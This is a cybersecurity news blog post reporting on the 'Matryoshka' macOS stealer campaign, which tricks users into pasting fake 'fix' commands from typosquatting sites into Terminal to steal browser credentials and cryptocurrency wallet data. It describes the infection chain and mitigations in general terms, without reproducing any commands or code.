Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Matryoshka Malware Targets macOS with New Stealer Variant

Matryoshka Malware Targets macOS with New Stealer Variant

Posted on February 16, 2026 By CWS

A newly identified social engineering campaign is taking aim at macOS users, deploying a sophisticated stealer malware through an advanced form of the ClickFix attack. This strain, dubbed ‘Matryoshka’ after the Russian nesting dolls, employs layered obfuscation techniques to evade detection by security systems.

Innovative Attack Techniques

Matryoshka deceives users into running Terminal commands that mimic legitimate software repairs, effectively bypassing conventional security measures. By exploiting typosquatting domains, the attack ensnares users who mistype URLs, particularly those seeking software reviews. Victims redirected to these fraudulent sites are prompted to input a ‘fix’ command in their macOS Terminal.

Security analysts at Intego have tracked this malicious activity, noting the use of domains like comparisions[.]org, which closely resembles the legitimate comparisons.org through minor typographical changes.

Advanced Evasion Strategies

Unlike past ClickFix variants, Matryoshka utilizes sophisticated evasion techniques designed to thwart detection efforts. The malware’s payload remains encoded and compressed until execution, operating solely in memory. This strategy complicates file-based scans and static analysis, reducing the ability of researchers to identify the threat.

Upon execution, the loader accesses an AppleScript payload crafted to extract browser credentials and target cryptocurrency wallets such as Trezor Suite and Ledger Live. If direct credential theft is unsuccessful, the malware resorts to fake system prompts that persistently solicit passwords.

Infection Process and Mitigations

The infection chain of Matryoshka progresses through several phases, each engineered to avoid detection while ensuring the malware’s operational success. Victims executing the malicious Terminal command initiate a sequence that decodes and decompresses a hidden shell script, avoiding the creation of detectable file artifacts.

The malware employs various evasion tactics, such as detaching its main process to rapidly conclude, deceiving users into believing the operation is complete. It suppresses terminal output and redirects streams to minimize visible clues. Additionally, its command-and-control infrastructure demands specific request headers, misleading unauthorized scanners with generic errors.

Users are advised against pasting commands from unverified sources into Terminal, as legitimate updates should not require such actions. Organizations should focus on blocking typosquatting domains, monitoring Terminal execution patterns, and scrutinizing any suspicious behavior related to cryptocurrency applications.

Stay informed by following us on Google News, LinkedIn, and X for more updates. Consider setting CSN as a preferred source in Google for real-time notifications.

Cyber Security News Tags:AppleScript, browser credentials, ClickFix, cryptocurrency theft, cyber attack, Cybersecurity, Intego, Ledger Live, macOS, Malware, Matryoshka, security evasion, social engineering, Terminal commands, Trezor Suite, typosquatting

Post navigation

Previous Post: Luxury Brands Fined $25 Million in South Korea for Data Breaches
Next Post: Lithuania Strengthens Cybersecurity Against AI Fraud

Related Posts

Authorities Dismanteled Major Credit Card Fraud Operation Impacting 4.3 Million Cardholders Authorities Dismanteled Major Credit Card Fraud Operation Impacting 4.3 Million Cardholders Cyber Security News
Windows Ancillary for WinSock 0-Day Vulnerability Let Attackers Escalate Privileges Windows Ancillary for WinSock 0-Day Vulnerability Let Attackers Escalate Privileges Cyber Security News
Threat Actors with Fake Job Lures Attacking Job Seekers to Deploy Advanced Malware Threat Actors with Fake Job Lures Attacking Job Seekers to Deploy Advanced Malware Cyber Security News
Sidewinder Hacker Group Weaponizing LNK File to Execute Malicious Scripts Sidewinder Hacker Group Weaponizing LNK File to Execute Malicious Scripts Cyber Security News
APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware Cyber Security News
Microsoft January 2026 Security Update Causes Credential Prompt Failures in Remote Desktop Connections Microsoft January 2026 Security Update Causes Credential Prompt Failures in Remote Desktop Connections Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • India Cracks Down on Apps Disabling E-Rickshaws
  • Hackers Exploit SEO to Mislead AI with Malicious Codes
  • North Korea-Linked npm Packages Pose Threat to Developers
  • Urgent Update Advised for Apache ActiveMQ Vulnerabilities
  • Major Cybersecurity Incidents: Canadian Hacker, ATM Fraud

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • India Cracks Down on Apps Disabling E-Rickshaws
  • Hackers Exploit SEO to Mislead AI with Malicious Codes
  • North Korea-Linked npm Packages Pose Threat to Developers
  • Urgent Update Advised for Apache ActiveMQ Vulnerabilities
  • Major Cybersecurity Incidents: Canadian Hacker, ATM Fraud

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark